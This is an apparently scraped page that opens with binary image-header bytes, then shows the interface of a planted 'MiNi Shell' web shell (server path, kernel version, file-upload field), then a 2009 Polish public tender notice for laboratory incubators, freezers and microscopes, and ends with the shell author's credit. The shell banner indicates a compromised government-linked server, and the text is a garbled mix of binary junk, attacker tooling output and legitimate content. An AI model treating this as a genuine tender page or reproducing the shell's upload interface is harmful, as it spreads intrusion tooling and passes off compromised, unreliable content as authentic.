JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090918/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090918/324152-N-2009.html

<p class="kh_header"><b>Warszawa-Wesoła: Zakup sprzętu laboratoryjnego.</b><br>
<b>Numer ogłoszenia: 324152 - 2009; data zamieszczenia: 18.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Inspektorat Ochrony Roślin i Nasiennictwa w Warszawie , ul. Żółkiewskiego 17, 05-075 Warszawa-Wesoła, woj. mazowieckie, tel. 022 7735908, faks 022 7735909.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piorin.gov.pl/warszawa</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup sprzętu laboratoryjnego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I

Inkubator laboratoryjny z chłodzeniem - 1 szt.

Lp.	Wymagane parametry

1.	zakres temperatur pracy: od -10 stopni C do + 60 stopni C

2.	pojemność komory roboczej 240 litrów  +/- 10 litrów

3.	maksymalne wymiary zewnętrzne (szer. x głęb. x wys.) 700 x 580 x 1620 mm

4.	zakres programowania pracy urządzenia:  12 kroków, maks.10 programów powtarzanych od 1 do 99 razy lub w  trybie pracy ciągłej, 

5.	wnętrze wykonane ze stali nierdzewnej

6.	w wyposażeniu 5 półek ze stali nierdzewnej z możliwością regulacji wysokości

7. 	wymuszony obieg powietrza

8.	mikroprocesorowy sterownik PID
9.	czytelny wyświetlacz temperatury LCD

10.	blokada hasłem panelu sterowania przed nieautoryzowanymi zmianami

11.	precyzyjny, elektroniczny czasomierz procesu

12.	wizualno-akustyczny alarm odchylenia od zadanej temperatury

13.	wizualno-akustyczne zabezpieczenie przed przegrzaniem

14.	port kablowy

15.	wymagane oświetlenie wnętrza - 15 W lampa uruchamiana w temp. od +5 stopni C do +50 stopni C sterowanie uruchamiane poprzez program
16.	możliwość ustawienia odszraniania  w trybie manualnym i automatycznym

17. 	możliwość podłączenia do komputera za pomocą opcjonalnego interfejsu RS 232
18.	możliwość zasłonięcia okna w drzwiach zewnętrznych specjalną płytą powstrzymującą dostęp światła
19.	drzwi z możliwością zmiany sposobu otwierania - prawo - lewo.

20.	gwarancja 24 miesiące

21.	oznakowanie CE



  
 
Zamrażarka laboratoryjna  - 1 szt.

Lp.	Wymagane parametry

1.	Zamrażarka laboratoryjna do -30 stopni C

2.	Wykonanie szafowe z jedną  komorą chłodzenia

3.	Pojemność: 270(+/-) 10 litrów

4.	Zakres ustawiania temperatury od -20 stopni C do -30 stopni C

5.	Dokładność regulacji temperatury +/-1 stopień C

6.	Sterownik mikroprocesorowy z wyświetlaczem typu LED

7.	Sygnalizacja alarmowa o stanach awaryjnych - wizualna i dźwiękowa

8. 	Alarmy wizualny i dźwiękowy : zaniku napięcia, zbyt wysokiej temperatury, zbyt niskiej temperatury

9.	Wymagane zamknięcia drzwi zamrażarki na klucz

10.	Wymagana blokada panelu sterowania przed nieautoryzowanymi zmianami

11.	Chłodzenie w zamrażarce oparte na chłodzeniu podpółkowym
12.	W wyposażeniu pojemniki na każdej półce, minimalna liczba pojemników - 5 szt.
13.	Maksymalne wymiary zewnętrzne: 
- szerokość:  610 mm
- głębokość: 733 mm
- wysokość: 1620 mm

14.	Wykonanie zewnętrzne: stal malowana

15.	Izolacja komory : pianka poliuretanowa

16.	Możliwość podłączenia rejestratora kołowego archiwizującego graficznie parametry pracy urządzenia. 

17.	W przypadku awarii urządzenia dłuższej niż 7dni, Wykonawca dostarczy urządzenie zastępcze



Chłodziarka laboratoryjna / lodówka laboratoryjna - 1 szt.
	
Lp.	Wymagane parametry

1.	Wysokość: od 1800 do 2100 mm
2.	Szerokość: od 700 do 750 mm
3.	Głębokość: od 800 do 850 mm
4.	Liczba drzwi: 1 , stal nierdzewna, pełne
5.	Układ chłodzenia: kompresor min. 185 W
6.	Automatyczne odszraniane: tak
7.	Liczba półek w chłodziarce: 4 szt.
8. 	Sterownik: mikroprocesorowy
9.	Regulacja temperatury : tak
10.	Oświetlenie wnętrza chłodziarki : tak, automatyczne
11.	Regulowane położenie kółek: tak
12.	Regulowane położenie półek : tak
13.	Wyświetlacz LED (temperatura w komorze chłodzenia, ulokowany nad drzwiami)
14.	Alarm temperaturowy: tak
15.	Drzwi zamykane na klucz: tak
16.	Łączna pojemność robocza : od 600 do 700 litrów
17.	Obudowa : stal nierdzewna
18. 	Wykonanie wnętrza : stal nierdzewna
19.	Zakres ustawianej temperatury : od -3 stopni C do +10 stopni C 
 

Urządzenia laboratoryjne należy dostarczyć, zainstalować i przeprowadzić szkolenie z obsługi w Wojewódzkim Inspektoracie Ochrony Roślin i Nasiennictwa w Warszawie
ul. Żółkiewskiego 17, 05-075 Warszawa-Wesoła


Część II

PARAMETRY ODCINAJĄCE (GRANICZNE)
    Mikroskop laboratoryjny - 1 szt.

Lp.
	Parametr  (wymagane warunki minimalne)	Tak / Nie
1.	STATYW	
	Statyw mikroskopu świetlnego o budowie modułowej, z możliwością rozbudowy o układ do fluorescencji
	TAK
	Obrotowy rewolwer do zamocowania min. 5 obiektywów
	TAK
	Filtr konwersyjny (wybielający)
	TAK
	Tubus binokularny o kącie nachylenia 45 stopni, o polu widzenia min. 20 mm
	TAK
	Tubus oraz statyw dla zapewnienia stabilności i trwałości muszą być w całości wykonane z metalu
	TAK
	Optyka korygowana do nieskończoności o odległości fokalnej 45mm
	TAK
	Okulary 10x o polu widzenia min. 20 mm, oba z korekcją dioptrii oraz muszlami ocznymi
	TAK
	Regulacja odstępu między okularami poprzez obrót tubusów okularowych w osi
	TAK
	Precyzyjny układ nastawiania ostrości ze współosiowymi pokrętłami mikro oraz makro-metrycznymi z obu stron statywu
	TAK
	Położenie pokrętek mikro-makro na tej samej wysokości co pokrętek przesuwu stolika w osiach
	TAK
2.	STOLIK MECHANICZNY	
	Stolik krzyżowy, ruchomy x,y w zakresie 75 x 30 mm, z ceramicznym pokryciem ochronnym, z uchwytem przesuwu po prawej stronie
	TAK
	Uchwyt szkiełek
	TAK
3.	KONDENSOR	
	Kondensor obrotowy Abbego o aperturze 0,9-1,25 do pracy w jasnym polu, możliwość pracy w kontraście fazowym i ciemnym polu	TAK
	Możliwość łatwego centrowania
	TAK
	Wbudowana, regulowana przysłona aperturowa
	TAK
4.	OŚWIETLENIE	
	Oświetlenie halogenowe wg. Kohleria o mocy 20W wbudowane w stopę mikroskopu	TAK
	Zasilacz stabilizowany wbudowany w statyw 
	TAK
	Płynna regulacja natężenia 
	TAK
	Wbudowana w statyw przysłona polowa
	TAK
5.	OBIEKTYWY korygowane na nieskończoność:	
	Plan Achromat 5x/0,12 odległość robocza min. 9,5mm
	TAK
	Plan Achromat 10x/0,25 odległość robocza min. 4,4mm
	TAK
	Plan Achromat 20x/0,45 odległość robocza min. 0,51mm	TAK
	Plan Achromat 40x/0,65 odległość robocza min. 0,45mm	TAK
	Plan Achromat 100x/1,25 olejowy odległość robocza min. 0,15mm	TAK
6.	Materiałowa osłona od kurzu	TAK
7.	Okularowa płytka mikrometryczna	TAK
8.	Szkiełko podstawowe ze wzorcem mikrometrycznym	TAK



Mikroskop stereoskopowy - 4 szt.

Lp.
	Parametr  (wymagane warunki minimalne)	Tak / Nie
1.	KORPUS	
	Układ optyczny typu Greenough
	TAK
	Zoom 1:7,7
	TAK
	Pole widzenia tubusów min. 23 mm
	TAK
	Powiększenia od 6,5x do 50x
	TAK
	Pole widzenia 35,4 mm - 4,6 mm
	TAK
	Odległość robocza min. 90 mm
	TAK
	Wymienne szkło ochronne zapobiegające dostawaniu się do mechanizmu stereoskopowego kurzu
	TAK
2.	STATYW Z OŚWIETLENIEM	
	Statyw mikroskopu ze zintegrowanym oświetleniem ledowym do światła odbitego min. 20W oraz do światła przechodzącego min. 10W	TAK
	Płynna regulacja natężenia obu oświetlaczy
	TAK
	Możliwość samodzielnej pracy oraz nakładania obu rodzajów oświetlenia	TAK
3.	OKULARY	
	Powiększenie 10x
	TAK
	Szerokopolowe, pole widzenia 23 mm
	TAK
	Osłony gumowe chroniące przed porysowaniem okularów korekcyjnych obserwatora	TAK
	Okulary z miejscem na zamontowanie jako opcji podziałki, siatki czy krzyża w każdym z okularów	TAK
	Możliwość rozbudowy o okulary 16x i 25x	TAK

4.	Materiałowa osłona od kurzu	
TAK

 
Należy dostarczyć, zainstalować i przeprowadzić szkolenie z obsługi:
Mikroskopu laboratoryjnego z wyposażeniem do analizy obrazu 1 szt. i mikroskopu stereoskopowego z wyposażeniem do analizy obrazu 4 szt 
w Wojewódzkim Inspektoracie Ochrony Roślin i Nasiennictwa w Warszawie
ul. Żółkiewskiego 17, 05-075 Warszawa-Wesoła.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 38.51.00.00-3, 39.71.11.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie niniejszego zamówienia ubiegać się mogą Wykonawcy spełniający   
            warunki udziału w postępowaniu określone w art. 22 ust.1 ustawy.
a.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
c.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy.
2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaga się, aby przynajmniej jeden z Wykonawców (lub wspólnie) spełniał wymagania, o których mowa w ust. 1. pkt a-c niniejszego rozdziału SIWZ. W przypadku konsorcjum żaden z wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy.
3.	Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie (spełnia/nie spełnia). W przypadku niespełnienia jakiegokolwiek warunku udziału w postępowaniu Wykonawca zostanie wykluczony z postępowania na podstawie art. 24 ust. 1 pkt 10 ustawy. O wykluczeniu z postępowania Wykonawca zostanie  powiadomiony zgodnie z art. 92 ust. 1 pkt 3 Prawa Zamówień Publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać następujące dokumenty:
1.1.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania oferty,
1.2.	aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie  właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.3.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2.	Do oferty wykonawca  dołącza obok dokumentów wyszczególnionych w punkcie 1:
2.1.	wypełniony formularz ofertowy (stanowiący Załącznik Nr 1 do niniejszej SIWZ),
2.2.	wypełnione oświadczenie o spełnianiu warunków w art. 22 ust. 1 i art 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (stanowiące Załącznik Nr 2 do niniejszej SIWZ), 
2.3.	wypełnione oświadczenie o zapoznaniu się przez wykonawców z warunkami przetargu i ich akceptacją (stanowiące Załącznik Nr 3 do niniejszej SIWZ).
3.	Dokumenty mogą być przedstawione w formie oryginałów albo kopii poświadczonych za zgodność z oryginałem przez upoważnion(ego)ych przedstawiciel(a)i wykonawcy. 
4.	Dokumenty powinny być dołączone do Formularza ofertowego (o którym mowa w pkt 2 
ppkt 2.1 niniejszego rozdziału) w formie załączników w kolejności wskazanej w tym Formularzu.
5.	Poświadczenie za zgodność z oryginałem winno być sporządzone w sposób umożliwiający identyfikację podpisu (np. wraz z imienną pieczątką osoby poświadczającej kopię dokumentu za zgodność z oryginałem).
6.	W przypadku poświadczenia za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo. Pełnomocnictwo powinno być przedstawione w formie oryginału lub poświadczonej za zgodność z oryginałem kopii.
7.	W przypadku konsorcjów każdy z przedsiębiorców lub podmiotów tworzących konsorcjum składa oddzielnie dokument wymieniony w pkt 1 ppkty 1.1, 1.2, 1.3 niniejszego rozdziału. W przypadku spółek cywilnych każdy z członków spółki składa oddzielnie dokument wymieniony w pkt 1 ppkty 1.1, 1.2, 1.3 niniejszego rozdziału W odniesieniu do pozostałych dokumentów konsorcjum lub spółka cywilna może złożyć jeden wspólny dokument. 
8.	Brak jakiegokolwiek z dokumentów wymaganych w SIWZ, lub złożenie dokumentu 
w niewłaściwej formie (np. nie poświadczone za zgodność z oryginałem kopie) spowoduje wykluczenie Wykonawcy z postępowania lub odrzucenie oferty, z zastrzeżeniem pkt. 9 niniejszego rozdziału.
9.	Zamawiający może żądać, w wyznaczonym przez siebie terminie wyjaśnień dotyczących przedstawionych przez Wykonawców dokumentów.
10.	W przypadku konsorcjum do oferty musi być załączony dokument ustanawiający pełnomocnika konsorcjum do reprezentowania go w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Termin realizacji - 10</li>
<li>3 - Okres gwarancji - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.piorin.gov.pl/warszawa.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Inspektorat Ochrony Roślin i Nasiennictwa w Warszawie
05-075 Warszawa-Wesoła, ul. Żółkiewskiego 17.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2009 godzina 10:00, miejsce: Wojewódzki Inspektorat Ochrony Roślin i Nasiennictwa w Warszawie
05-075 Warszawa-Wesoła, ul. Żółkiewskiego 17, pokój  nr 204, II piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com